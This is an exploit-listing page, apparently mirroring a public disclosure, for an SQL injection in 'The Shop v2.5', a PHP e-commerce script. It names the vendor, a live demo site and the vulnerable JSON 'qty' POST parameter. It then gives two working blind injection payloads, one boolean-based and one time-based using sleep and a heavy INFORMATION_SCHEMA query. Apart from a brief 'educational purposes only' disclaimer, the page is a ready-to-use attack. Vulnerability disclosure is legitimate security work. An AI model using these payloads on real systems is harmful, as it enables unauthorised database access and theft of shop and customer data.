The shop v2.5 sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-06-19 |
Type : webapps |
Platform : php
This exploit / vulnerability The shop v2.5 sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A
Parameter: JSON qty ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
END))","temp_user_id":null}
Type: time-based blind
Title: MySQL > 5.0.12 OR time-based blind (heavy query)
Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
C)","temp_user_id":null}